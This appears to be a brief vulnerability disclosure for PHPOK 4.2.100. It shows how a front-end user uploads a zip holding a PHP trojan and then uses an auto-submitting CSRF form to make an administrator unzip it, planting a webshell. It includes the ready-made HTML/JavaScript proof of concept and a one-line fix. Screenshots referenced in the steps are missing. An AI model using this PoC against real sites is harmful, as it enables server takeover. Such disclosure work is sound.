Phpok csrf success getshell (2)

Phpok csrf success getshell (2)

Register an account at the front end, upload a zip file, and upgrade the csrf background (the file is uploaded as a zip file). getshell is successful.

The Update file is not verified.

Version: 4.2.100

The front-end can upload zip files without verifying the upgrade files.



Upload zip Demo:

First, import our Trojan file test.phpinto the compressed package test.zip.



Register an account-Modify information.



Select a normal image and capture data


 

 

Then modify the data.


 

The zip file is uploaded successfully. Record the file ID. We have 739



During program upgrade? Referer verification is not performed on the upgrade operations of the ZIP offline package. Csrf generation

Demo csrf:

 

Poc:



Zipfile is the ID number of the file we just recorded: 739
 

<form action="http://localhost//phpok/admin.php?c=update&f=unzip" id="poc" name="poc" method="post"><input type="hidden" name="zipfile" value=""/><input type="hidden" name="file" value=""/><input type="submit" name="up" value="submit"/></form><script>var t = document.poc;t.zipfile.value="739";t.file.value="739";document.poc.submit();</script>

The Administrator only needs to access the poc we have prepared in advance. Getshell

Test. php is lying in the root directory.

 

Solution:

Verify the Update file.